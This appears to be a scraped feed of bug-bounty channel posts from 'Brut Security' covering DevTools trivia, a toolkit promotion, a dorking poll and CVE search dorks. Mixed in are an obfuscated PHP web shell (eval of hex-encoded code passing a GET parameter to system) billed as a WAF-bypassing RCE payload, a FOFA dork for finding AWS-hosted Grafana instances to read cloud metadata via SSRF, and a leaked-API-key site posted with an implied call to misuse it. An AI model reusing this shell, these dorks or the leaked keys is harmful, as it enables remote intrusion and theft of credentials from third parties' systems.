Where are the reactions, guys?
Hey Hunters,
DarkShadow back at it again, dropping something many of you probably never noticed!
Did you know your Chrome DevTools is actually a webpage itself?
URL: devtools://devtools/bundled/devtools_app.html
Yup, you read that right.
Try this:
- Open the URL
- Then hit F12 inside DevTools
- BOOM, you're debugging the DevTools itself
Ever seen DevTools inside DevTools?
Welcome to the Devception
Let me know in the comments:
Who just learned this for the first time?
If you enjoy the kind of content I share, show some love: like, comment, and share it with your hacker fam.
#bugbountytips
Brut Security
Heads up, folks!
Just released BrutDroid recently - an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasn't been as strong as expected.
Might make it private soon. If you're planning to use it or have feedback, now's the time! Would love your thoughts.
https://github.com/Brut-Security/BrutDroid/
Feel free to DM or tag me with suggestions.
- Stay Brut.
BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulator rooting, Frida, and Burp Suite integration.
Perfect for anyone involved in:
Brut Security
Take advantage of this opportunity and explore ZoomEye's premium features!
#BrutSecurity #ZoomEye
Hey Hunters,
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
Anonymous Poll
1. Google Dorking: 44%
2. Shodan: 25%
3. FOFA (now with AI!): 20%
4. ZoomEye: 4%
5. Netlas: 2%
6. Censys: 6%
Brut Security
I made this payload that is able to bypass WAF, even IDS, to execute RCE
<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>
Hex decode:
if($x_=$_GET[0]){system($x_);}
DarkShadow's secret payload don't share outside
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating
Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!
Search at Netlas.io:
Link: https://nt.ls/nmu5K
Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"
Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
Hey Hunters,
DarkShadow here, back again, just dropping a simple FOFA dork that I made to find all Grafana vulnerable versions which are using AWS and that helps you read all cloud metadata through Grafana SSRF CVE-2025-4123
FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0"body="Grafana v10.0.1" body="Grafana v10.0.2"body="Grafana v10.0.3" body="Grafana v10.0.4"body="Grafana v10.0.5" body="Grafana v10.0.6"body="Grafana v10.0.7" body="Grafana v10.0.8"body="Grafana v10.0.9" body="Grafana v10.0.10"body="Grafana v10.0.11" body="Grafana v10.0.12"body="Grafana v10.1.0" body="Grafana v10.1.1"body="Grafana v10.1.2" body="Grafana v10.1.3"body="Grafana v10.1.4" body="Grafana v10.1.5"body="Grafana v10.1.6" body="Grafana v10.1.7"body="Grafana v10.1.8" body="Grafana v10.1.9"body="Grafana v10.1.10" body="Grafana v10.2.0"body="Grafana v10.2.1" body="Grafana v10.2.2"body="Grafana v10.2.3" body="Grafana v10.2.4"body="Grafana v10.2.5" body="Grafana v10.2.6"body="Grafana v10.2.7" body="Grafana v10.3.0"body="Grafana v10.3.1" body="Grafana v10.3.2"body="Grafana v10.3.3" body="Grafana v10.3.4"body="Grafana v10.3.5" body="Grafana v10.4.0"body="Grafana v10.4.1" body="Grafana v10.4.2"body="Grafana v10.4.3" body="Grafana v10.4.4"body="Grafana v10.4.5" body="Grafana v10.4.6"body="Grafana v10.4.7" body="Grafana v10.4.8"body="Grafana v10.4.9" body="Grafana v10.4.10"body="Grafana v10.4.11" body="Grafana v10.4.12"body="Grafana v10.4.13" body="Grafana v10.4.14"body="Grafana v10.4.15" body="Grafana v10.4.16"body="Grafana v10.4.17" body="Grafana v11.0.0"body="Grafana v11.0.1" body="Grafana v11.0.2"body="Grafana v11.0.3" body="Grafana v11.0.4"body="Grafana v11.0.5" body="Grafana v11.1.0"body="Grafana v11.1.1" body="Grafana v11.1.2"body="Grafana v11.1.3" body="Grafana v11.1.4"body="Grafana v11.2.0" body="Grafana v11.2.1"body="Grafana v11.2.2" body="Grafana v11.2.3"body="Grafana v11.3.0" body="Grafana v11.3.1"body="Grafana v11.3.2" body="Grafana v11.3.3"body="Grafana v11.4.0" body="Grafana v11.4.1"body="Grafana v11.4.2" body="Grafana v11.4.3"body="Grafana v11.5.0" body="Grafana v11.5.1"body="Grafana v11.5.2" body="Grafana v11.5.3"body="Grafana v11.5.4" body="Grafana v11.5.5"body="Grafana v11.5.6" body="Grafana 
v11.6.0" || body="Grafana v12.0.0")
Grep the full dork in comment
#dork #fofa #bugbountytips
CVE-2025-42989: Missing Authorization in SAP NetWeaver, 9.6 rating
One of the vulnerabilities disclosed in a recent patch allows an authenticated user to escalate their privileges, which could critically impact the integrity and availability of the system.
Search at Netlas.io:
Link: https://nt.ls/lB0fI
Dork: http.body:"This error page was generated by SAP Web Dispatcher!"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
Brut Security
https://www.unsecuredapikeys.com/
You know what you have to do
Brut Security
New Script Alert - Subdomain Monitoring (Coming Soon!) from Brut Security
For those who've been waiting on a simple and efficient way to monitor subdomains automatically, your wait is almost over. We've been working on a Bash script that:
Monitors…